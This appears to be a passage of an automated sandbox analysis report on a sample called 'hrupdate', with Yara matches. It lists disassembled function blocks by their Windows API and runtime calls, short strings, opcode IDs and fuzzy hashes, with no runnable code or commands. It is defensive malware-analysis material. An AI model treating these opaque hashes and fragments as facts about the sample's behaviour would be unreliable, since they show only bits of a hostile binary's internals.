                                      • Instruction Fuzzy Hash: 58F05E76A00118BB8B11DAE6DD88CEF7EBCDA896947100025FA01D3101F6769E51EB70
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469BE9D
                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,0469A5FC,?,00000000), ref: 0469BEB1
                                      • Sleep.KERNEL32(000001F4,?,?,?,0469A5FC,?,00000000), ref: 0469BEC5
                                      • GetTickCount.KERNEL32 ref: 0469BECB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$NamedPeekPipeSleep
                                      • String ID:
                                      • API String ID: 1593283408-0
                                      • Opcode ID: 4fb69b883e89eee85d6364cb264c64ab2f379639f3ea722f44e324eb02889ccf
                                      • Instruction ID: 85ef573e46af014050e00bcb8e7cdbacda9d9850347c8090b25c265981ff9122
                                      • Opcode Fuzzy Hash: 4fb69b883e89eee85d6364cb264c64ab2f379639f3ea722f44e324eb02889ccf
                                      • Instruction Fuzzy Hash: 0BF01C71A0011EBFAF105B95ED848EFBBACEA85AD57144476E601DA101F6F4BD418A60
                                      APIs
                                      • __getptd.LIBCMT ref: 046B7456
                                        • Part of subcall function 046B061D: __getptd_noexit.LIBCMT ref: 046B0620
                                        • Part of subcall function 046B061D: __amsg_exit.LIBCMT ref: 046B062D
                                      • __getptd.LIBCMT ref: 046B746D
                                      • __amsg_exit.LIBCMT ref: 046B747B
                                      • __lock.LIBCMT ref: 046B748B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                      • String ID:
                                      • API String ID: 3521780317-0
                                      • Opcode ID: f65c208acdbb131fdbdfb307c1b08c771e7fd23bb4c298e414b26217a80ea344
                                      • Instruction ID: 6156a1b4e0f735e4efc16f6ee1f5178679c3fbb1ee0d162b70e7fe464ef25f59
                                      • Opcode Fuzzy Hash: f65c208acdbb131fdbdfb307c1b08c771e7fd23bb4c298e414b26217a80ea344
                                      • Instruction Fuzzy Hash: 3FF01D31A007149AE720AB6494157D97BA0AB81756F04464ED4D0A7680FB647981CBDA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset
                                      • String ID: l.dl$ntdl
                                      • API String ID: 2102423945-1236859653
                                      • Opcode ID: 69ba40200b6beec9a905c53d2e840a4474f04e105710daa9c43c764fd694520b
                                      • Instruction ID: a0fce7f75b5f64261c8cd2b2d34f9f81c61cd70da665010e4f5079f82d1416e0
                                      • Opcode Fuzzy Hash: 69ba40200b6beec9a905c53d2e840a4474f04e105710daa9c43c764fd694520b
                                      • Instruction Fuzzy Hash: 42711374A40609DFCB24CF98C590AACB7F1FF58315B2584AAD904AB355E734EEA1CF90
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,046DA64C,00000000,?,?,?,0469611D,046DA64C,00000000,00008000,000002F0,?,00000000,0469632B,?,00000001), ref: 046A2BFD
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CurrentProcess
                                      • String ID: p,v
                                      • API String ID: 246607088-381846232
                                      • Opcode ID: 6298a64283236a39d42617a9e0c17504cd898e500c85d4987d59fe42d182498d
                                      • Instruction ID: 1debe528673e44e6eec212864524e60a29cb66494d7d49918ad85f99192230be
                                      • Opcode Fuzzy Hash: 6298a64283236a39d42617a9e0c17504cd898e500c85d4987d59fe42d182498d
                                      • Instruction Fuzzy Hash: 7221A0B5981204BBDB68AF90DC94CAB3B6EEB15354B005499F40A92340F679AD25CFA0
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006730B7
                                      • ___raise_securityfailure.LIBCMT ref: 0067319E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                      • String ID: 0bg
                                      • API String ID: 3761405300-1597489500
                                      • Opcode ID: 65f2a0ad1142d573d5d435e0e34aa4b7de559e6363e9e3d6a902099df147114c
                                      • Instruction ID: 3b522c6f46672df64b3ace6561743bb64ebb24edf2a49adb52286be9fc414c92
                                      • Opcode Fuzzy Hash: 65f2a0ad1142d573d5d435e0e34aa4b7de559e6363e9e3d6a902099df147114c
                                      • Instruction Fuzzy Hash: 2B21D3B4511B00DED758CF25E9856507BE6FB48724F10B02AF50D8B3A2E3B15AC4CF49
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __snprintf
                                      • String ID: %c%c%c%c
                                      • API String ID: 2633826957-103593547
                                      • Opcode ID: b9c91b603de30d91d624f8b50c892411ef86fcd67ee4733386d96d2536c9ed20
                                      • Instruction ID: 041989ac2abcc2aa8294bda0d3c7ec53f4c10ea14d564cfa499b6d83586e0e88
                                      • Opcode Fuzzy Hash: b9c91b603de30d91d624f8b50c892411ef86fcd67ee4733386d96d2536c9ed20
                                      • Instruction Fuzzy Hash: 6FF0C26184064E6EDB05EBA4CC8EEFFBFBC8B08205F000085AA50D2002F625E7598FA0
                                      APIs
                                      • _malloc.LIBCMT ref: 0469F512
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 0469F526
                                        • Part of subcall function 0469F544: _malloc.LIBCMT ref: 0469F551
                                        • Part of subcall function 0469F544: __snprintf.LIBCMT ref: 0469F562
                                        • Part of subcall function 0469F544: FindFirstFileA.KERNEL32(00000000,046996DC,?,0469F633,046996DC,?,Function_0000565A), ref: 0469F56F
                                        • Part of subcall function 0469F544: _malloc.LIBCMT ref: 0469F5AE
                                        • Part of subcall function 0469F544: __snprintf.LIBCMT ref: 0469F5C3
                                        • Part of subcall function 0469F544: FindNextFileA.KERNEL32(000000FF,046996DC,?,?,?,?,?,?,?), ref: 0469F5F0
                                        • Part of subcall function 0469F544: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 0469F5FD
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                      • String ID: %s\%s
                                      • API String ID: 1254174322-4073750446
                                      • Opcode ID: 867e706bbd33ec37d0863ad4e5216c300ecd3ff44a9047f62de90f8c822bfc28
                                      • Instruction ID: 541c6516642796fa3209e892e8417f9491fbc19b922cfe510b4ec3f2579425b0
                                      • Opcode Fuzzy Hash: 867e706bbd33ec37d0863ad4e5216c300ecd3ff44a9047f62de90f8c822bfc28
                                      • Instruction Fuzzy Hash: 27E08C32481518779F122E92DC00DBF7A2DEF865A4B00402DFE0C61110AA266D316EBA